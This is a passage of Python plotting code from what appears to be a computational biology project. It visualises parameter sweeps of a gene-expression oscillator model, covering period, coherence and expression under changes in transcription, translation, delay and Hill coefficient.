statistic_names = [ 'basal_transcription_rate',
'translation_rate',
'repression_threshold',
'time_delay',
'hill_coefficient' ]
my_figure = plt.figure( figsize = (4.5, 7.5) )
decrease_ratios = dict()
increase_ratios = dict()
for parameter_name in parameter_names:
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'data',
'narrowed_relative_sweeps_' +
parameter_name + '.npy'))
number_of_absolute_samples = len(np.where(np.logical_or(my_parameter_sweep_results[:,9,3] > 600,
my_parameter_sweep_results[:,9,4] < 0.05))[0])
decrease_indices = np.where(np.logical_and(np.logical_or(my_parameter_sweep_results[:,9,4] < 0.05,
my_parameter_sweep_results[:,9,3] > 600),
np.logical_and(my_parameter_sweep_results[:,4,3] < 300,
my_parameter_sweep_results[:,4,4] > 0.1)))
decrease_ratios[parameter_name] = len(decrease_indices[0])/float(number_of_absolute_samples)
increase_indices = np.where(np.logical_and(np.logical_or(my_parameter_sweep_results[:,9,4] < 0.05,
my_parameter_sweep_results[:,9,3] > 600),
np.logical_and(my_parameter_sweep_results[:,14,3] < 300,
my_parameter_sweep_results[:,14,4] > 0.1)))
increase_ratios[parameter_name] = len(increase_indices[0])/float(number_of_absolute_samples)
increase_bars = [increase_ratios[parameter_name] for parameter_name
in parameter_names]
decrease_bars = [decrease_ratios[parameter_name] for parameter_name
in parameter_names]
increase_positions = np.arange(len(increase_bars))
decrease_positions = np.arange(len(decrease_bars)) + len(increase_bars)
all_positions = np.hstack((increase_positions, decrease_positions))
all_bars = np.array( increase_bars + decrease_bars)
labels_up = [x_labels[parameter_name] + ' up' for parameter_name in parameter_names]
labels_down = [x_labels[parameter_name] + ' down' for parameter_name in parameter_names]
all_labels = labels_up + labels_down
sorting_indices = np.argsort(all_bars)
sorted_labels = [all_labels[sorting_index] for
sorting_index in sorting_indices]
sorted_bars = np.sort(all_bars)
# sorted_bars = -np.log(sorted_bars)
sorted_bars/= np.sum(sorted_bars)
sorted_bars = sorted_bars[::-1]
my_figure.add_subplot(611)
plt.bar(all_positions, sorted_bars)
sorted_labels.reverse()
plt.xticks( all_positions + 0.4 ,
sorted_labels,
rotation = 30,
fontsize = 3,
horizontalalignment = 'right')
plt.xlim(all_positions[0] - 0.5,)
plt.gca().locator_params(axis='y', tight = True, nbins=5)
plt.ylim(0,sorted_bars[0]*1.2)
plt.ylabel('Likelihood')
x_positions = dict()
for index, position in enumerate(all_positions):
x_positions[sorted_labels[index]] = position
for statistic_index, statistic_name in enumerate(statistic_names):
statistic_values = dict()
for parameter_name in parameter_names:
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'data',
'narrowed_relative_sweeps_' +
parameter_name + '.npy'))
number_of_absolute_samples = len(np.where(np.logical_or(my_parameter_sweep_results[:,9,3] > 600,
my_parameter_sweep_results[:,9,4] < 0.05))[0])
decrease_indices = np.where(np.logical_and(np.logical_or(my_parameter_sweep_results[:,9,4] < 0.05,
my_parameter_sweep_results[:,9,3] > 600),
np.logical_and(my_parameter_sweep_results[:,4,3] < 300,
my_parameter_sweep_results[:,4,4] > 0.1)))
decrease_statistic_values = my_posterior_samples[decrease_indices, statistic_index]
statistic_values[x_labels[parameter_name] + ' down'] = decrease_statistic_values
increase_indices = np.where(np.logical_and(np.logical_or(my_parameter_sweep_results[:,9,4] < 0.05,
my_parameter_sweep_results[:,9,3] > 600),
np.logical_and(my_parameter_sweep_results[:,14,3] < 300,
my_parameter_sweep_results[:,14,4] > 0.1)))
increase_statistic_values = my_posterior_samples[increase_indices, statistic_index]
statistic_values[x_labels[parameter_name] + ' up'] = increase_statistic_values
my_figure.add_subplot(6,1,statistic_index + 2)
# loop through all parameters up and down combinations
for label in sorted_labels:
# get x position and statistic values
this_x_position = x_positions[label]
these_statistic_values = statistic_values[label]
# make x values
these_x_positions = this_x_position - 0.2 + 0.4*np.random.rand(len(these_statistic_values.flatten()))
if statistic_name.startswith('repression_threshold'):
these_statistic_values/=10000
# scatter
if plotting_option == 'samples_only':
print('hello')
plt.scatter(these_x_positions, these_statistic_values,
marker = '.', lw = 0, color = 'dimgrey',
# alpha = 0.1,
s = 1,
zorder = 0)
elif plotting_option == 'boxes':
print('hell1')
plt.boxplot(these_statistic_values, positions = [this_x_position],
sym = '', widths = [0.7])
plt.gca().set_rasterization_zorder(1)
if statistic_name.startswith('translation_rate') or statistic_name.startswith('basal_transcription_rate'):
plt.gca().set_yscale("log")
else:
plt.gca().locator_params(axis='y', tight = True, nbins=5)
# plt.gca().xaxis.set_ticks([])
# plt.gca().xaxis.set_ticklabels([])
plt.xticks( all_positions,
sorted_labels,
rotation = 30,
fontsize = 3,
horizontalalignment = 'right')
plt.xlim(all_positions[0] - 0.5,)
# plt.ylim(0,sorted_bars[-1]*1.2)
plt.ylabel(x_labels[statistic_name], fontsize = 5)
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output',
'likelihood_plot_extension_' + plotting_option + '.pdf'), dpi = 400)
for reference_point in ['start', 'end']:
my_figure = plt.figure( figsize = (4.5, 7.5) )
if reference_point == 'start':
statistic_names = ['Expression', 'rel. std.', 'Period', 'Coherence', '<mRNA>']
else:
statistic_names = ['Expression', 'rel. std.', 'Period', 'Coherence']
for statistic_index, statistic_name in enumerate(statistic_names):
statistic_values = dict()
for parameter_name in parameter_names:
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'data',
'narrowed_relative_sweeps_' +
parameter_name + '.npy'))
number_of_absolute_samples = len(np.where(np.logical_or(my_parameter_sweep_results[:,9,3] > 600,
my_parameter_sweep_results[:,9,4] < 0.05))[0])
decrease_indices = np.where(np.logical_and(np.logical_or(my_parameter_sweep_results[:,9,4] < 0.05,
my_parameter_sweep_results[:,9,3] > 600),
np.logical_and(my_parameter_sweep_results[:,4,3] < 300,
my_parameter_sweep_results[:,4,4] > 0.1)))
if reference_point == 'start':
decrease_statistic_values = accepted_model_results[decrease_indices, statistic_index]
elif reference_point == 'end':
decrease_statistic_values = my_parameter_sweep_results[decrease_indices, 4, statistic_index+1]
statistic_values[x_labels[parameter_name] + ' down'] = decrease_statistic_values
increase_indices = np.where(np.logical_and(np.logical_or(my_parameter_sweep_results[:,9,4] < 0.05,
my_parameter_sweep_results[:,9,3] > 600),
np.logical_and(my_parameter_sweep_results[:,14,3] < 300,
my_parameter_sweep_results[:,14,4] > 0.1)))
if reference_point == 'start':
increase_statistic_values = accepted_model_results[increase_indices, statistic_index]
elif reference_point == 'end':
increase_statistic_values = my_parameter_sweep_results[increase_indices, 14, statistic_index+1]
statistic_values[x_labels[parameter_name] + ' up'] = increase_statistic_values
my_figure.add_subplot(5,1,statistic_index + 1)
# loop through all parameters up and down combinations
for label in sorted_labels:
# get x position and statistic values
this_x_position = x_positions[label]
these_statistic_values = statistic_values[label]
# make x values
these_x_positions = this_x_position - 0.2 + 0.4*np.random.rand(len(these_statistic_values.flatten()))
# scatter
if statistic_name.startswith('Expression'):
these_statistic_values/=10000
if plotting_option == 'samples_only':
plt.scatter(these_x_positions, these_statistic_values,
marker = '.', lw = 0, color = 'dimgrey',
# alpha = 0.1,
s = 1,
zorder = 0)
elif plotting_option == 'boxes':
plt.boxplot(these_statistic_values, positions = [this_x_position],
sym = '', widths = [0.7])
plt.gca().set_rasterization_zorder(1)
if statistic_name == 'Period':
pass
# plt.ylim(200,350)
plt.gca().locator_params(axis='y', tight = True, nbins=5)
# plt.gca().xaxis.set_ticks([])
# plt.gca().xaxis.set_ticklabels([])
plt.xticks( all_positions,
sorted_labels,
rotation = 30,
fontsize = 3,
horizontalalignment = 'right')
plt.xlim(all_positions[0] - 0.5,)
# plt.ylim(0,sorted_bars[-1]*1.2)
plt.ylabel(statistic_name, fontsize = 5)
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output',
'likelihood_plot_extension_' + plotting_option + '_' + reference_point + '.pdf'), dpi = 400)
def xest_plot_bayes_factors_for_models(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data','sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
sns.set()
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05))))
my_posterior_samples = prior_samples[accepted_indices]
accepted_model_results = model_results[accepted_indices]
new_accepted_indices = np.where(my_posterior_samples[:,1]<10)
number_of_absolute_samples = len(accepted_indices[0])
print('base model accepted that many indices')
print(number_of_absolute_samples)
parameter_names = ['basal_transcription_rate',
'translation_rate',
'repression_threshold',
'time_delay',
'mRNA_degradation_rate',
'protein_degradation_rate',
'hill_coefficient']
x_labels = dict()
x_labels['basal_transcription_rate'] = 'Transcription rate'
x_labels['translation_rate'] = 'Translation rate'
x_labels['repression_threshold'] = 'Repression threshold'
x_labels['time_delay'] = 'Transcription delay'
x_labels['mRNA_degradation_rate'] = 'mRNA degradation'
x_labels['protein_degradation_rate'] = 'Protein degradation'
x_labels['hill_coefficient'] = 'Hill coefficient'
reference_parameters = dict()
decrease_ratios = dict()
increase_ratios = dict()
bardata = []
## Increase in coherence
for parameter_name in parameter_names:
print('investigating ' + parameter_name)
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'data',
'logarithmic_relative_sweeps_' +
parameter_name + '.npy'))
print('these accepted base samples are')
# print len(np.where(my_parameter_sweep_results[:,9,4] < 0.1)[0])
# number_of_absolute_samples = len(np.where(my_parameter_sweep_results[:,9,3] > 1000)[0])
# print number_of_absolute_samples
decrease_indices = np.where(np.logical_and(my_parameter_sweep_results[:,9,4] < 0.1,
my_parameter_sweep_results[:,4,4] > 0.1))
# decrease_indices = np.where(np.logical_and(my_parameter_sweep_results[:,9,3] > 1000,
# my_parameter_sweep_results[:,4,3] < 300))
decrease_ratios[parameter_name] = len(decrease_indices[0])/float(number_of_absolute_samples)
increase_indices = np.where(np.logical_and(my_parameter_sweep_results[:,9,4] < 0.1,
my_parameter_sweep_results[:,14,4] > 0.1))
# increase_indices = np.where(np.logical_and(my_parameter_sweep_results[:,9,3] > 1000,
# my_parameter_sweep_results[:,14,3] < 300))
increase_ratios[parameter_name] = len(increase_indices[0])/float(number_of_absolute_samples)
increase_bars = [increase_ratios[parameter_name] for parameter_name
in parameter_names]
decrease_bars = [decrease_ratios[parameter_name] for parameter_name
in parameter_names]
increase_positions = np.arange(len(increase_bars))
decrease_positions = np.arange(len(decrease_bars)) + len(increase_bars)
all_positions = np.hstack((increase_positions, decrease_positions))
all_bars = np.array( increase_bars + decrease_bars)
labels_up = [x_labels[parameter_name] + ' up' for parameter_name in parameter_names]
labels_down = [x_labels[parameter_name] + ' down' for parameter_name in parameter_names]
all_labels = labels_up + labels_down
sorting_indices = np.argsort(all_bars)
sorted_labels = [all_labels[sorting_index] for
sorting_index in sorting_indices]
sorted_bars = np.sort(all_bars)
sorted_bars/= np.sum(sorted_bars)
my_figure = plt.figure( figsize = (4.5, 1.5) )
plt.bar(all_positions, sorted_bars[::-1])
sorted_labels.reverse()
plt.xticks( all_positions + 0.4 ,
sorted_labels,
rotation = 30,
fontsize = 3,
horizontalalignment = 'right')
plt.xlim(all_positions[0] - 0.5,)
plt.gca().locator_params(axis='y', tight = True, nbins=5)
plt.ylabel('Likelihood')
plt.ylim(0,sorted_bars[-1]*1.2)
# plt.ylim(0,1)
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output',
'likelihood_plot_coherence_increase_from_0.1.pdf'))
## Increase in coherence
for parameter_name in parameter_names:
print('investigating ' + parameter_name)
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'data',
'logarithmic_relative_sweeps_' +
parameter_name + '.npy'))
# my_reducing_indices = np.where(my_posterior_samples[:,0]<13)
# my_parameter_sweep_results = my_parameter_sweep_results[new_accepted_indices]
print('these accepted base samples are')
# print len(np.where(my_parameter_sweep_results[:,9,4] < 0.1)[0])
# number_of_absolute_samples = len(np.where(np.logical_or(my_parameter_sweep_results[:,9,3] > 300,
# my_parameter_sweep_results[:,9,4] < 0.1))[0])
number_of_absolute_samples = len(np.where(np.logical_or(my_parameter_sweep_results[:,9,3] > 600,
my_parameter_sweep_results[:,9,4] < 0.1))[0])
# number_of_absolute_samples = len(np.where( my_parameter_sweep_results[:,9,4] < 0.2)[0])
# number_of_absolute_samples = len(np.where( my_parameter_sweep_results[:,9,4] < 0.2)[0])
print(number_of_absolute_samples)
# decrease_indices = np.where(np.logical_and(my_parameter_sweep_results[:,9,4] < 0.1,
# my_parameter_sweep_results[:,4,4] > 0.1))
# decrease_indices = np.where(np.logical_and(my_parameter_sweep_results[:,9,3] > 600,
# decrease_indices = np.where(np.logical_and(my_parameter_sweep_results[:,9,4] < 0.2,
# np.logical_and(my_parameter_sweep_results[:,4,3] < 300,
# my_parameter_sweep_results[:,4,4] > 0.1)))
decrease_indices = np.where(np.logical_and(np.logical_or(my_parameter_sweep_results[:,9,4] < 0.1,
my_parameter_sweep_results[:,9,3] > 600),
np.logical_and(my_parameter_sweep_results[:,4,3] < 300,
my_parameter_sweep_results[:,4,4] > 0.1)))
decrease_ratios[parameter_name] = len(decrease_indices[0])/float(number_of_absolute_samples)
# increase_indices = np.where(np.logical_and(my_parameter_sweep_results[:,9,3] > 600,
increase_indices = np.where(np.logical_and(np.logical_or(my_parameter_sweep_results[:,9,4] < 0.1,
my_parameter_sweep_results[:,9,3] > 600),
np.logical_and(my_parameter_sweep_results[:,14,3] < 300,
my_parameter_sweep_results[:,14,4] > 0.1)))
# increase_indices = np.where(np.logical_and( my_parameter_sweep_results[:,9,3] < 0.2,
# np.logical_and(my_parameter_sweep_results[:,14,3] < 300,
# my_parameter_sweep_results[:,14,4] > 0.1)))
# np.logical_and(my_parameter_sweep_results[:,9,4] < 0.1,
# np.logical_and(my_parameter_sweep_results[:,14,3] < 300,
# my_parameter_sweep_results[:,14,4] > 0.1)))
# increase_indices = np.where(np.logical_and(my_parameter_sweep_results[:,9,4] < 0.1,
# my_parameter_sweep_results[:,14,4] > 0.1))
# increase_indices = np.where(np.logical_and(my_parameter_sweep_results[:,9,3] > 1000,
# my_parameter_sweep_results[:,14,3] < 300))
increase_ratios[parameter_name] = len(increase_indices[0])/float(number_of_absolute_samples)
increase_bars = [increase_ratios[parameter_name] for parameter_name
in parameter_names]
decrease_bars = [decrease_ratios[parameter_name] for parameter_name
in parameter_names]
increase_positions = np.arange(len(increase_bars))
decrease_positions = np.arange(len(decrease_bars)) + len(increase_bars)
all_positions = np.hstack((increase_positions, decrease_positions))
all_bars = np.array( increase_bars + decrease_bars)
labels_up = [x_labels[parameter_name] + ' up' for parameter_name in parameter_names]
labels_down = [x_labels[parameter_name] + ' down' for parameter_name in parameter_names]
all_labels = labels_up + labels_down
sorting_indices = np.argsort(all_bars)
sorted_labels = [all_labels[sorting_index] for
sorting_index in sorting_indices]
sorted_bars = np.sort(all_bars)
# sorted_bars = -np.log(sorted_bars)
sorted_bars/= np.sum(sorted_bars)
my_figure = plt.figure( figsize = (4.5, 1.5) )
plt.bar(all_positions, sorted_bars[::-1])
sorted_labels.reverse()
plt.xticks( all_positions + 0.4 ,
sorted_labels,
rotation = 30,
fontsize = 5,
horizontalalignment = 'right')
plt.xlim(all_positions[0] - 0.5,)
plt.gca().locator_params(axis='y', tight = True, nbins=5)
plt.ylim(0,sorted_bars[-1]*1.2)
plt.ylabel('Likelihood')
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output',
'likelihood_plot_period_decrease_below_six_hours_and_coherence_above_0.1.pdf'))
def xest_plot_relative_parameter_variation_coherence_increase_logarithmic(self):
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'data','sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,3]>0.3, #coherence
# prior_samples[:,3]>20))))) #time_delay
# prior_samples[:,0]<10))))) #transcription_rate
# prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
accepted_model_results = model_results[accepted_indices]
# other_accepted_indices = np.where(accepted_model_results[:,3] < 0.2)
# my_posterior_samples = prior_samples[other_accepted_indices]
# model_results = model_results[other_accepted_indices]
parameter_names = ['basal_transcription_rate',
'translation_rate',
'repression_threshold',
'time_delay',
'mRNA_degradation_rate',
'protein_degradation_rate',
'hill_coefficient']
# parameter_names = ['repression_threshold']
x_labels = dict()
x_labels['basal_transcription_rate'] = 'rel. Transcription rate'
x_labels['translation_rate'] = 'rel. Translation rate'
x_labels['repression_threshold'] = 'rel. Repression threshold'
x_labels['time_delay'] = 'rel. Transcription delay'
x_labels['mRNA_degradation_rate'] = 'rel. mRNA degradation'
x_labels['protein_degradation_rate'] = 'rel. Protein degradation'
x_labels['hill_coefficient'] = 'rel. Hill coefficient'
reference_indices = dict()
reference_indices['basal_transcription_rate'] = 5
reference_indices['translation_rate'] = 5
reference_indices['repression_threshold'] = 5
reference_indices['time_delay'] = 15
# reference_indices['mRNA_degradation_rate'] = 15
reference_indices['mRNA_degradation_rate'] = 5
reference_indices['protein_degradation_rate'] = 15
reference_indices['hill_coefficient'] = 15
parameter_indices = dict()
parameter_indices['basal_transcription_rate'] = 0
parameter_indices['translation_rate'] = 1
parameter_indices['repression_threshold'] = 2
parameter_indices['time_delay'] = 3
reference_parameters = dict()
for parameter_name in parameter_names:
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'data',
'logarithmic_relative_sweeps_' + parameter_name + '.npy'))
# my_parameter_sweep_results = my_parameter_sweep_results[other_accepted_indices]
# increase_indices = np.where(np.logical_and(my_parameter_sweep_results[:,9,4] <
# my_parameter_sweep_results[:,reference_indices[parameter_name] -1 ,4],
# # my_parameter_sweep_results[:,reference_indices[parameter_name] -1,4] > 0.2))
# np.logical_and(my_parameter_sweep_results[:,reference_indices[parameter_name] -1,4] >
# my_parameter_sweep_results[:,9,4]*8,
# np.logical_and(my_parameter_sweep_results[:,9,4] < 0.1,
# my_parameter_sweep_results[:,reference_indices[parameter_name] -1 ,4] > 0.2))))
# # np.logical_and(my_parameter_sweep_results[:,reference_indices[parameter_name] -1,3] < 400,
# # my_parameter_sweep_results[:,20 - reference_indices[parameter_name] -1,4] < 0.05))))
# # np.logical_and(my_parameter_sweep_results[:,20 - reference_indices[parameter_name] -1,4] < 0.05,
# # my_parameter_sweep_results[:,9,3] < 400)))))
increase_indices = np.where(np.logical_and(my_parameter_sweep_results[:,9,4] < 0.1,
np.logical_or(my_parameter_sweep_results[:,4,4]>0.1,
my_parameter_sweep_results[:,14,4]>0.1)))
# my_parameter_sweep_results[:,
# np.logical_or(my_parameter_sweep_results[:,
# 4,
# 4] > 0.2,
# my_parameter_sweep_results[:,
# 14,
# 4] > 0.2)))
# np.logical_or(my_parameter_sweep_results[:,
# 4,
# 3] < 400,
# my_parameter_sweep_results[:,
# 14,
# 3] < 400)))
# 4] > 0.15))
# my_parameter_sweep_results[:,reference_indices[parameter_name] -1,4] > 0.2))
# np.logical_and(my_parameter_sweep_results[:,reference_indices[parameter_name] -1,4] >
# my_parameter_sweep_results[:,9,4]*8,
# np.logical_and(my_parameter_sweep_results[:,9,4] < 0.1,
# my_parameter_sweep_results[:,reference_indices[parameter_name] -1 ,4] > 0.2))))
# np.logical_and(my_parameter_sweep_results[:,reference_indices[parameter_name] -1,3] < 400,
# my_parameter_sweep_results[:,20 - reference_indices[parameter_name] -1,4] < 0.05))))
# np.logical_and(my_parameter_sweep_results[:,20 - reference_indices[parameter_name] -1,4] < 0.05,
# my_parameter_sweep_results[:,9,3] < 400)))))
my_parameter_sweep_results = my_parameter_sweep_results[increase_indices]
# my_sweep_parameters = my_posterior_samples[increase_indices]
my_figure = plt.figure( figsize = (6.5, 1.5) )
this_axis = my_figure.add_subplot(131)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,3], color ='black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Period [min]')
this_axis.set_ylim(0,700)
this_axis = my_figure.add_subplot(132)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,4], color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Coherence')
# this_axis.set_ylim(0,1)
# this_axis.set_ylim(0,0.5)
this_axis.set_ylim(0,0.4)
this_axis = my_figure.add_subplot(133)
for results_table in my_parameter_sweep_results:
this_axis.errorbar(results_table[:,0],
results_table[:,1]/10000,
yerr = results_table[:,2]/10000*results_table[:,1],
color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_ylim(0,15)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Expression/1e4')
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','logarithmic_relative_sweep_coherence_increases_large_' + parameter_name + '.pdf'))
def xest_plot_relative_parameter_variation_coherence_increase_low_transcription(self):
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_hill_low_transcription')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,3]>0.3, #coherence
# prior_samples[:,3]>20))))) #time_delay
# prior_samples[:,0]<10))))) #transcription_rate
# prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
accepted_model_results = model_results[accepted_indices]
# other_accepted_indices = np.where(accepted_model_results[:,3] < 0.2)
# my_posterior_samples = prior_samples[other_accepted_indices]
# model_results = model_results[other_accepted_indices]
parameter_names = ['basal_transcription_rate',
'translation_rate',
'repression_threshold',
'time_delay',
'mRNA_degradation_rate',
'protein_degradation_rate',
'hill_coefficient']
# parameter_names = ['repression_threshold']
x_labels = dict()
x_labels['basal_transcription_rate'] = 'rel. Transcription rate'
x_labels['translation_rate'] = 'rel. Translation rate'
x_labels['repression_threshold'] = 'rel. Repression threshold'
x_labels['time_delay'] = 'rel. Transcription delay'
x_labels['mRNA_degradation_rate'] = 'rel. mRNA degradation'
x_labels['protein_degradation_rate'] = 'rel. Protein degradation'
x_labels['hill_coefficient'] = 'rel. Hill coefficient'
reference_indices = dict()
reference_indices['basal_transcription_rate'] = 5
reference_indices['translation_rate'] = 5
reference_indices['repression_threshold'] = 5
reference_indices['time_delay'] = 15
# reference_indices['mRNA_degradation_rate'] = 15
reference_indices['mRNA_degradation_rate'] = 5
reference_indices['protein_degradation_rate'] = 15
reference_indices['hill_coefficient'] = 15
parameter_indices = dict()
parameter_indices['basal_transcription_rate'] = 0
parameter_indices['translation_rate'] = 1
parameter_indices['repression_threshold'] = 2
parameter_indices['time_delay'] = 3
reference_parameters = dict()
for parameter_name in parameter_names:
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'output',
'hill_relative_sweeps_low_transcription' + parameter_name + '.npy'))
# my_parameter_sweep_results = my_parameter_sweep_results[other_accepted_indices]
# increase_indices = np.where(np.logical_and(my_parameter_sweep_results[:,9,4] <
# my_parameter_sweep_results[:,reference_indices[parameter_name] -1 ,4],
# # my_parameter_sweep_results[:,reference_indices[parameter_name] -1,4] > 0.2))
# np.logical_and(my_parameter_sweep_results[:,reference_indices[parameter_name] -1,4] >
# my_parameter_sweep_results[:,9,4]*8,
# np.logical_and(my_parameter_sweep_results[:,9,4] < 0.1,
# my_parameter_sweep_results[:,reference_indices[parameter_name] -1 ,4] > 0.2))))
# # np.logical_and(my_parameter_sweep_results[:,reference_indices[parameter_name] -1,3] < 400,
# # my_parameter_sweep_results[:,20 - reference_indices[parameter_name] -1,4] < 0.05))))
# # np.logical_and(my_parameter_sweep_results[:,20 - reference_indices[parameter_name] -1,4] < 0.05,
# # my_parameter_sweep_results[:,9,3] < 400)))))
increase_indices = np.where(np.logical_and(my_parameter_sweep_results[:,9,4] < 0.1,
my_parameter_sweep_results[:,
reference_indices[parameter_name],
3] < 400))
# 4] > 0.15))
# my_parameter_sweep_results[:,reference_indices[parameter_name] -1,4] > 0.2))
# np.logical_and(my_parameter_sweep_results[:,reference_indices[parameter_name] -1,4] >
# my_parameter_sweep_results[:,9,4]*8,
# np.logical_and(my_parameter_sweep_results[:,9,4] < 0.1,
# my_parameter_sweep_results[:,reference_indices[parameter_name] -1 ,4] > 0.2))))
# np.logical_and(my_parameter_sweep_results[:,reference_indices[parameter_name] -1,3] < 400,
# my_parameter_sweep_results[:,20 - reference_indices[parameter_name] -1,4] < 0.05))))
# np.logical_and(my_parameter_sweep_results[:,20 - reference_indices[parameter_name] -1,4] < 0.05,
# my_parameter_sweep_results[:,9,3] < 400)))))
my_parameter_sweep_results = my_parameter_sweep_results[increase_indices]
my_sweep_parameters = my_posterior_samples[increase_indices]
my_figure = plt.figure( figsize = (6.5, 1.5) )
this_axis = my_figure.add_subplot(131)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,3], color ='black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Period [min]')
this_axis.set_ylim(0,700)
this_axis = my_figure.add_subplot(132)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,4], color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Coherence')
# this_axis.set_ylim(0,1)
# this_axis.set_ylim(0,0.5)
this_axis.set_ylim(0,0.25)
this_axis = my_figure.add_subplot(133)
for results_table in my_parameter_sweep_results:
this_axis.errorbar(results_table[:,0],
results_table[:,1]/10000,
yerr = results_table[:,2]/10000*results_table[:,1],
color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_ylim(0,15)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Expression/1e4')
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','multiple_relative_sweep_low_transcription_coherence_increases_' + parameter_name + '.pdf'))
def xest_plot_pairplot_for_coherence_increase(self):
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_hill_low_transcription')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
my_posterior_samples = prior_samples[accepted_indices]
accepted_model_results = model_results[accepted_indices]
# other_accepted_indices = np.where(accepted_model_results[:,3] < 0.2)
# my_posterior_samples = my_posterior_samples[other_accepted_indices]
#
# model_results = accepted_model_results[other_accepted_indices]
parameter_names = ['basal_transcription_rate',
'translation_rate',
'repression_threshold',
'time_delay',
'mRNA_degradation_rate',
'protein_degradation_rate',
'hill_coefficient']
x_labels = dict()
x_labels['basal_transcription_rate'] = 'rel. Transcription rate'
x_labels['translation_rate'] = 'rel. Translation rate'
x_labels['repression_threshold'] = 'rel. Repression threshold'
x_labels['time_delay'] = 'rel. Transcription delay'
x_labels['mRNA_degradation_rate'] = 'rel. mRNA degradation'
x_labels['protein_degradation_rate'] = 'rel. Protein degradation'
x_labels['hill_coefficient'] = 'rel. Hill coefficient'
reference_indices = dict()
reference_indices['basal_transcription_rate'] = 5
reference_indices['translation_rate'] = 5
reference_indices['repression_threshold'] = 5
reference_indices['time_delay'] = 15
# reference_indices['mRNA_degradation_rate'] = 15
reference_indices['mRNA_degradation_rate'] = 5
reference_indices['protein_degradation_rate'] = 15
reference_indices['hill_coefficient'] = 15
parameter_indices = dict()
parameter_indices['basal_transcription_rate'] = 0
parameter_indices['translation_rate'] = 1
parameter_indices['repression_threshold'] = 2
parameter_indices['time_delay'] = 3
reference_parameters = dict()
for parameter_name in parameter_names:
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'output',
'hill_relative_sweeps_low_transcription' + parameter_name + '.npy'))
# my_parameter_sweep_results = my_parameter_sweep_results[other_accepted_indices]
increase_indices = np.where(np.logical_and(my_parameter_sweep_results[:,9,4] <
my_parameter_sweep_results[:,reference_indices[parameter_name] -1 ,4],
# my_parameter_sweep_results[:,reference_indices[parameter_name] -1,4] > 0.2))
np.logical_and(my_parameter_sweep_results[:,reference_indices[parameter_name] -1,4] >
my_parameter_sweep_results[:,9,4]*1.2,
np.logical_and(my_parameter_sweep_results[:,9,4] < 0.2,
my_parameter_sweep_results[:,reference_indices[parameter_name] -1 ,4] > 0.2))))
#
